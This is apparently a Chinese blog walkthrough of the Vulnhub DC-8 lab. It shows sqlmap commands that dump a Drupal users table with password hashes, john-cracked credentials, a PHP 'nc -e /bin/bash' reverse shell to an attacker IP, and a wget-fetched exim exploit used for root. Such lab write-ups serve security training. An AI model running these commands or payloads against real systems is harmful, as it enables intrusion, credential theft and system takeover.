首页 > 其他分享 >Vulnhub | DC-8

Vulnhub | DC-8

时间:2022-08-27 17:11:15浏览次数:43  
标签:sqlmap 0.107 http -- DC 192.168 Vulnhub john

信息搜集

通过寻找真实IP和端口扫描

发现开放22和80端口

访问页面,发现是和DC1的cms一样

 

 

 

漏洞发现-SQL注入

点击选项时,发现url后加了“nid=1”

加个',发现数据库报错,存在SQL注入漏洞

上SQLMAP

python2 sqlmap.py -u http://192.168.0.107/?nid=1 --batch --dbs

 

python2 sqlmap.py -u http://192.168.0.107/?nid=1 --batch -D d7db --tables

看到有一个user表,其他的看起来不是很重要,先放着不管

python2 sqlmap.py -u http://192.168.0.107/?nid=1 --batch -D d7db -T users --dump

这格式很难受,但是SQLMAP扫描完会自动保存一个csv文件在

C:\Users\xxx\AppData\Local\sqlmap\output\192.168.0.107

这样就舒服多了

 

爆出来admin和john的hash加密密码

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

这里看了别的WP,是需要用到一个叫 ”john“的工具(kali自带)

把两个hash密码分别保存到txt中,然后使用命令john hash.txt

爆admin账户就卡着不动了,最后爆出了john的密码

user : john
pass : turtle

百度找一下该cms的后台登录路径,在/user下

登录成功

反弹Shell

登录了后台就继续找可利用的点

 

 

 

 

 

试了试phphinfo,但是路径不知道在哪里,尝试直接反弹shell

 

<p>flag</p>
<?php
system("nc -e /bin/bash 192.168.0.109 7777");
 ?>

保存后发现没有触发,是因为还需要提交信息

随便填点,然后点击submit

反弹成功

 

提权

python -c "import pty;pty.spawn('/bin/bash')"

先获取交互式窗口,接着找找有没有可利用的提权方法

sudo -l其实看到www用户,这条命令就不用试了,没什么用

find / -perm -u=s -type f 2>/dev/null

这里本来没看出什么,后来参考大佬文章可以使用这个”exim“进行提权(自己还是太菜)

打开MSF,searchsploit exim

 

查看一下当前exim版本,是4.89,根据版本选择一个exp

kali来到cd /usr/share/exploitdb/exploits/linux/local目录下

开启一个http服务 python -m http.server

然后在靶机中执行

wget http://192.168.0.109:8000/46996.sh

给一个最高权限777,./执行脚本文件

 

 

 

提了个寂寞?

后来发现原来是脚本需要加参数

./46996.sh -m netcat(但是要注意,提上之后有时效性,过一会就断了)

接着就是拿flag了

 

 

 

标签:sqlmap,0.107,http,--,DC,192.168,Vulnhub,john
From: https://www.cnblogs.com/mlxwl/p/16630926.html

相关文章

  • flink cdc 使用
    flinkcdc使用目前cdc产品非常多,目前我使用canal,flinkcdc(集成debezium)二者对比相对来说flinkcdc更加强大,功能很多但是有很多坑,迭代速度很快,借助flink......
  • 四大组件之广播接收者BroadcastReceiver
    参考:Android开发基础之广播接收者BroadcastReceiver什么是广播接收者?我们小时候都知道,听广播,收听广播!什么是收听广播呢?打开收音机,调频就可以收到对应的广播节目了。其实......
  • flutter系列之:构建Widget的上下文环境BuildContext详解
    目录简介BuildContext的本质BuildContext和InheritedWidgetBuildContext的层级关系总结简介我们知道Flutter中有两种Widget,分别是StatelessWidget和StatefulWidget,Statel......
  • Caused by: java.lang.UnsupportedClassVersionError: com/hfplm/handler/HFEBOMation
    Causedby:java.lang.UnsupportedClassVersionError:com/hfplm/handler/HFEBOMationHandlerhasbeencompiledbyamorerecentversionoftheJavaRuntime(classf......
  • ica:1-vulnhub靶场
    环境信息靶机:192.168.124.149攻击机:192.168.124.129打靶过程nmap扫描端口及服务发现开放22,80,3306,33060端口访问80端口是一个登录页面,且发现使用了qdpm项目管......
  • 累加器的高级使用--实现wordcount
    HighWordCountAccumulator.scalapackageaccumulatorimportorg.apache.spark.util.AccumulatorV2importscala.collection.mutable/*继承AccumulatorV2类,传递......
  • Vulnhub | DC-6
    信息搜集主机发现、端口扫描 访问80端口,域名自动解析‘wordy’在本地和kali的hosts文件写入192.168.0.141wordyWeb渗透后台爆破 用了wordpress的cms用Ka......
  • [Express] Extends CrudController with Mongoose model
    Eachmodelcontroller:import{crudControllers}from'../../utils/crud'import{Item}from'./item.model'exportdefaultcrudControllers(Item)Youareabl......
  • Chapter8. 单bit信号跨时钟域同步CDC
    Chapter8.单bit信号跨时钟域同步CDC本章导图单bit信号慢到快传输对于电平信号快到慢由于电平信号高电平时间足够长,因此直接打两拍避免亚稳态是可以的。对于边沿信号......
  • 世纪互联:IDC产业4.0时代,击穿数字化“破局点”
      如果说互联网是种子,数据是肥料,那么数据中心就是土地。过去的四分之一世纪,技术驱动IDC产业塑造外部形态;来到“分工明确、全方位合作的”产业4.0时代,以构建“客户新......